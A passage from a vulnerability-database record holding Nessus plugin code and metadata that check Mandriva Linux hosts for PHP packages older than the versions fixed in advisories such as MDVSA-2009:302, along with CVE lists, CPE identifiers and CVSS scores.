yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-calendar-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-cgi-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", 
reference:\"php-cli-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-ctype-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-curl-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-dba-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-dbase-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-devel-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-dom-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-exif-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-fcgi-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-filter-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-ftp-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-gd-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-gettext-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-gmp-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-hash-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-iconv-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-imap-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-json-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-ldap-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", 
reference:\"php-mbstring-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-mcrypt-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-mhash-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-mime_magic-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-ming-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-mssql-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-mysql-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-mysqli-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-ncurses-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-odbc-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-openssl-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pcntl-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pdo-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pdo_dblib-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pdo_mysql-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pdo_odbc-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pdo_pgsql-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pdo_sqlite-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pgsql-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) 
flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-posix-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pspell-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-readline-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-recode-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-session-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-shmop-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-snmp-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-soap-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-sockets-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-sqlite-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-sybase-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-sysvmsg-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-sysvsem-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-sysvshm-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-tidy-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-tokenizer-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-wddx-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-xml-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", 
reference:\"php-xmlreader-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-xmlrpc-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-xmlwriter-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-xsl-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-zlib-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:52:24", "description": "Some vulnerabilities were discovered and corrected in php-5.3.1 :\n\n - Added max_file_uploads INI directive, which can be set\n to limit the number of file uploads per-request to 20 by\n default, to prevent possible DOS via temporary file\n exhaustion. (Ilia)\n\n - Added missing sanity checks around exif processing.\n (CVE-2009-3292, Ilia)\n\n - Fixed a safe_mode bypass in tempnam() identified by\n Grzegorz Stachowiak. (CVE-2009-3557, Rasmus)\n\n - Fixed a open_basedir bypass in posix_mkfifo() identified\n by Grzegorz Stachowiak. 
(CVE-2009-3558, Rasmus)\n\n - Fixed bug #50063 (safe_mode_include_dir fails).\n (CVE-2009-3559, Johannes, christian at elmerot dot se)\n\nAdditionally, some packages which require so, have been rebuilt and\nare being provided as updates.", "edition": 25, "published": "2010-07-30T00:00:00", "title": "Mandriva Linux Security Advisory : php (MDVSA-2009:302)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-3292", "CVE-2009-3559", "CVE-2009-3557"], "modified": "2010-07-30T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:php-xmlwriter", "p-cpe:/a:mandriva:linux:php-json", "p-cpe:/a:mandriva:linux:php-bcmath", "p-cpe:/a:mandriva:linux:php-gd", "p-cpe:/a:mandriva:linux:php-pdo", "p-cpe:/a:mandriva:linux:php-calendar", "p-cpe:/a:mandriva:linux:php-mbstring", "p-cpe:/a:mandriva:linux:php-sqlite3", "p-cpe:/a:mandriva:linux:php-sysvmsg", "p-cpe:/a:mandriva:linux:php-posix", "p-cpe:/a:mandriva:linux:php-cgi", "p-cpe:/a:mandriva:linux:php-pcntl", "p-cpe:/a:mandriva:linux:php-hash", "p-cpe:/a:mandriva:linux:php-zlib", "p-cpe:/a:mandriva:linux:php-openssl", "p-cpe:/a:mandriva:linux:php-soap", "p-cpe:/a:mandriva:linux:php-sybase_ct", "p-cpe:/a:mandriva:linux:php-xml", "p-cpe:/a:mandriva:linux:php-ftp", "p-cpe:/a:mandriva:linux:php-dom", "p-cpe:/a:mandriva:linux:php-apc", "p-cpe:/a:mandriva:linux:php-curl", "p-cpe:/a:mandriva:linux:php-sysvsem", "p-cpe:/a:mandriva:linux:php-ctype", "p-cpe:/a:mandriva:linux:php-sockets", "p-cpe:/a:mandriva:linux:php-gmp", "p-cpe:/a:mandriva:linux:php-sysvshm", "p-cpe:/a:mandriva:linux:php-pdo_pgsql", "p-cpe:/a:mandriva:linux:php-pdo_mysql", "p-cpe:/a:mandriva:linux:php-xmlrpc", "p-cpe:/a:mandriva:linux:php-bz2", "p-cpe:/a:mandriva:linux:php-ldap", "p-cpe:/a:mandriva:linux:php-xsl", "p-cpe:/a:mandriva:linux:php-tidy", "p-cpe:/a:mandriva:linux:php-fileinfo", "p-cpe:/a:mandriva:linux:lib64php5_common5", "p-cpe:/a:mandriva:linux:php-xmlreader", "p-cpe:/a:mandriva:linux:php-cli", "p-cpe:/a:mandriva:linux:php-mssql", 
"p-cpe:/a:mandriva:linux:apache-mod_php", "p-cpe:/a:mandriva:linux:php-session", "p-cpe:/a:mandriva:linux:php-readline", "p-cpe:/a:mandriva:linux:php-pdo_sqlite", "p-cpe:/a:mandriva:linux:libphp5_common5", "p-cpe:/a:mandriva:linux:php-tokenizer", "p-cpe:/a:mandriva:linux:php-doc", "p-cpe:/a:mandriva:linux:php-enchant", "p-cpe:/a:mandriva:linux:php-pgsql", "cpe:/o:mandriva:linux:2010.0", "p-cpe:/a:mandriva:linux:php-recode", "p-cpe:/a:mandriva:linux:php-gettext", "p-cpe:/a:mandriva:linux:php-imap", "p-cpe:/a:mandriva:linux:php-iconv", "p-cpe:/a:mandriva:linux:php-devel", "p-cpe:/a:mandriva:linux:php-pdo_dblib", "p-cpe:/a:mandriva:linux:php-exif", "p-cpe:/a:mandriva:linux:php-eaccelerator", "p-cpe:/a:mandriva:linux:php-odbc", "p-cpe:/a:mandriva:linux:php-pdo_odbc", "p-cpe:/a:mandriva:linux:php-snmp", "p-cpe:/a:mandriva:linux:php-mysql", "p-cpe:/a:mandriva:linux:php-pspell", "p-cpe:/a:mandriva:linux:php-apc-admin", "p-cpe:/a:mandriva:linux:php-eaccelerator-admin", "p-cpe:/a:mandriva:linux:php-intl", "p-cpe:/a:mandriva:linux:php-filter", "p-cpe:/a:mandriva:linux:php-wddx", "p-cpe:/a:mandriva:linux:php-dba", "p-cpe:/a:mandriva:linux:php-mcrypt", "p-cpe:/a:mandriva:linux:php-shmop", "p-cpe:/a:mandriva:linux:php-suhosin", "p-cpe:/a:mandriva:linux:php-mysqli", "p-cpe:/a:mandriva:linux:php-zip"], "id": "MANDRIVA_MDVSA-2009-302.NASL", "href": "https://www.tenable.com/plugins/nessus/48158", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:302. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48158);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-3292\", \"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-3559\");\n script_bugtraq_id(37079);\n script_xref(name:\"MDVSA\", value:\"2009:302\");\n\n script_name(english:\"Mandriva Linux Security Advisory : php (MDVSA-2009:302)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Some vulnerabilities were discovered and corrected in php-5.3.1 :\n\n - Added max_file_uploads INI directive, which can be set\n to limit the number of file uploads per-request to 20 by\n default, to prevent possible DOS via temporary file\n exhaustion. (Ilia)\n\n - Added missing sanity checks around exif processing.\n (CVE-2009-3292, Ilia)\n\n - Fixed a safe_mode bypass in tempnam() identified by\n Grzegorz Stachowiak. (CVE-2009-3557, Rasmus)\n\n - Fixed a open_basedir bypass in posix_mkfifo() identified\n by Grzegorz Stachowiak. 
(CVE-2009-3558, Rasmus)\n\n - Fixed bug #50063 (safe_mode_include_dir fails).\n (CVE-2009-3559, Johannes, christian at elmerot dot se)\n\nAdditionally, some packages which require so, have been rebuilt and\nare being provided as updates.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://news.php.net/php.announce/79\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-apc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-apc-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dba\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-eaccelerator-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mssql\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_dblib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sqlite3\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:php-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sybase_ct\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_php-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libphp5_common5-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-apc-3.1.3p1-2.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-apc-admin-3.1.3p1-2.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-bcmath-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-bz2-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-calendar-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-cgi-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-cli-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", 
reference:\"php-ctype-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-curl-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-dba-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-devel-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-doc-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-dom-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-eaccelerator-0.9.6-0.358.4.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-eaccelerator-admin-0.9.6-0.358.4.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-enchant-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-exif-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-fileinfo-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-filter-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-ftp-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-gd-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-gettext-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-gmp-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-hash-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-iconv-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-imap-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif 
(rpm_check(release:\"MDK2010.0\", reference:\"php-intl-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-json-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-ldap-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-mbstring-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-mcrypt-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-mssql-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-mysql-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-mysqli-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-odbc-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-openssl-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pcntl-5.3.1-0.1mdv2010.0\", 